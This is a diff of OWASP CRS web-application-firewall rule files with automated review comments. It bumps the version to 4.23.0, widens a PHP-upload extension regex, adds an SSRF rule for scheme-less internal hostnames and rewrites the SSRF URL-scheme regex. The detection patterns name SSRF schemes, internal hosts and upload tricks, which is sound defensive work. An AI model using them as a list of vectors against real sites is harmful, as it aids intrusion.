@@ -588,7 +649,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X capture,\ t:none,\ msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ - logdata:'Matched Data: %{TX.0} found within %{TX.933151_MATCHED_VAR_NAME}: %{TX.933151_MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -597,10 +658,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ - setvar:'tx.933151_matched_var=%{MATCHED_VAR}',\ - setvar:'tx.933151_matched_var_name=%{MATCHED_VAR_NAME}',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -618,7 +677,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X capture,\ t:none,\ msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ - logdata:'Matched Data: %{TX.0} found within %{TX.933152_MATCHED_VAR_NAME}: %{TX.933152_MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -627,10 +686,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ - setvar:'tx.933152_matched_var=%{MATCHED_VAR}',\ - setvar:'tx.933152_matched_var_name=%{MATCHED_VAR_NAME}',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -648,7 +705,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X capture,\ t:none,\ msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\ - logdata:'Matched Data: %{TX.0} found within %{TX.933153_MATCHED_VAR_NAME}: %{TX.933153_MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ @@ -657,16 +714,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ - setvar:'tx.933153_matched_var=%{MATCHED_VAR}',\ - setvar:'tx.933153_matched_var_name=%{MATCHED_VAR_NAME}',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # 
@@ -709,7 +764,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx AUTH_T tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -754,7 +809,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -781,7 +836,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X # # This rule is a stricter sibling of rule 933110. # -SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\..*$" \ +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.ph(?:p\d*|tml|ar|ps|t|pt)\..*$" \ "id:933111,\ phase:2,\ block,\ @@ -797,7 +852,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" 
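Review bot: The wider extension alternation in the 933111 operator (`\.ph(?:p\d*|tml|ar|ps|t|pt)\.`) is not mirrored by any change to rule 933110 in this chunk, although the context comment calls 933111 "a stricter sibling of rule 933110"; confirm 933110's list was widened the same way, or add a comment explaining why the PL3 rule recognises `.phar`, `.phps`, `.pht` and `.phpt` while the PL1 sibling does not. A regression test for each new extension in the double-extension form this rule targets would pin the change.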
@@ -827,7 +882,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm ?>" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -863,14 +918,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf index 026b7953e6..b06835d370 100644 --- a/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf +++ b/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf 
@@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -67,7 +67,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ 
@@ -103,7 +103,36 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-GENERIC',\
 tag:'capec/1000/225/664',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+# This rule detects SSRF attempts using hostnames without schemes.
+# Some frameworks and libraries add implicit 'http://' or 'https://' schemes
+# when processing URLs, making scheme-less hostnames effective attack vectors.
+#
+# Examples:
+# - localhost/
+# - host.docker.internal/
+# - kubernetes.default.svc.cluster.local/
+SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile ssrf-no-scheme.data" \
+ "id:934190,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Possible Server Side Request Forgery (SSRF) Attack: Scheme-less localhost or internal hostname detected',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-ssrf',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'OWASP_CRS/ATTACK-GENERIC',\
+ tag:'capec/1000/225/664',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -138,7 +167,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:__p
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-GENERIC',\
 tag:'capec/1/180/77',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
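Review bot: `@pmFromFile ssrf-no-scheme.data` is a case-insensitive substring match, so every entry also fires when embedded in a longer token, and with `REQUEST_FILENAME` among the 934190 targets any URL path that contains an entry as a segment (a documentation page whose path includes `localhost/`, for instance) scores CRITICAL at PL1. The data file is not in this chunk; confirm its entries keep the trailing `/` shown in the comment examples, and add a line to the comment such as `# @pm matches substrings; keep the trailing slash on every entry so the bare word in ordinary text does not match.`. A few negative tests with these hostnames appearing as plain words, plus one with a path-like argument, would record the accepted false-positive boundary.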
@@ -171,7 +200,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx Proces tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -203,7 +232,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ @@ -234,13 +263,13 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # 
@@ -263,7 +292,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ 
@@ -300,7 +329,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|X # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 934120 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[0-9]{10}|(?:0x[0-9a-f]{2}\.){3}0x[0-9a-f]{2}|0x(?:[0-9a-f]{8}|[0-9a-f]{16})|(?:0{1,4}[0-9]{1,3}\.){3}0{1,4}[0-9]{1,3}|[0-9]{1,3}\.(?:[0-9]{1,3}\.[0-9]{5}|[0-9]{8})|(?:\x5c\x5c[\-0-9a-z]\.?_?)+|\[[0-:a-f]+(?:[\.0-9]+|%[0-9A-Z_a-z]+)?\]|[a-z][\-\.0-9A-Z_a-z]{1,255}:[0-9]{1,5}(?:#?[\s\x0b]*&?@(?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}|[a-z][\-\.0-9A-Z_a-z]{1,255}):[0-9]{1,5}/?)+|[\.0-9]{0,11}(?:\x{e2}(?:\x91[\xa0-\x{bf}]|\x92[\x80-\x{bf}]|\x93[\x80-\x{a9}\x{ab}-\x{bf}])|\x{e3}\x80\x82)+)" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i)(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip):/?/?(?:[0-9]{7,10}|(?:0x[0-9a-f]{2}\.){3}0x[0-9a-f]{2}|0x(?:[0-9a-f]{8}|[0-9a-f]{16})|(?:0{1,4}[0-9]{1,3}\.){3}0{1,4}[0-9]{1,3}|[0-9]{1,3}\.(?:[0-9]{1,3}\.[0-9]{5}|[0-9]{8})|(?:\x5c\x5c[\-0-9a-z]\.?_?)+|\[[0-:a-f]+(?:[\.0-9]+|%[0-9A-Z_a-z]+)?\]|[a-z][\-\.0-9A-Z_a-z]{1,255}:[0-9]{1,5}(?:#?[\s\x0b]*&?@(?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}|[a-z][\-\.0-9A-Z_a-z]{1,255}):[0-9]{1,5}/?)+|[\.0-9]{0,11}(?:\x{e2}(?:\x91[\xa0-\x{bf}]|\x92[\x80-\x{bf}]|\x93[\x80-\x{a9}\x{ab}-\x{bf}])|\x{e3}\x80\x82)+)" \ "id:934120,\ phase:2,\ block,\ @@ -316,7 +345,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/225/664',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -332,7 +361,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 934140 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^(?:[^@]|@[^\{])*@+\{[^\}]*\}" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx @+\{[\s\x0b]*\[" \ "id:934140,\ phase:2,\ block,\ 
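Review bot: Both operator rewrites on this line, 934120 and 934140, are toolchain-generated per their context comments (`crs-toolchain regex update 934120` / `934140`), and the regex-assembly sources are not in this chunk; confirm those sources changed in the same commit, or the next regeneration reverts both. For 934120 the separator is now `:/?/?` and the decimal-IP branch `[0-9]{7,10}`, and because the pattern has no leading `\b`, a scheme keyword embedded in a longer word and followed by a colon and seven digits (`…cid:1234567`) now matches with no `//` at all; the PL2 placement limits the impact, but negative tests for such short colon-digit tokens are warranted. For 934140, `@+\{[\s\x0b]*\[` is strictly narrower than the old `^(?:[^@]|@[^\{])*@+\{[^\}]*\}` since it now requires `[` after the brace; the comment above the rule lies outside the hunk and should say that only the `@{[ … ]}` form is targeted.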
@@ -349,7 +378,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^(?:[^ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -377,20 +406,20 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\{% tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-GENERIC',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # 
diff --git a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf index d8e5ed2a02..187292e2cd 100644 --- a/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf +++ b/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -63,7 +63,7 @@ SecRule REQUEST_FILENAME "!@validateByteRange 20,45-47,48-57,65-90,95,97-122" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ ctl:ruleRemoveTargetByTag=xss-perf-disable;REQUEST_FILENAME,\ - ver:'OWASP_CRS/4.22.0'" + ver:'OWASP_CRS/4.23.0'" # @@ -96,7 +96,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
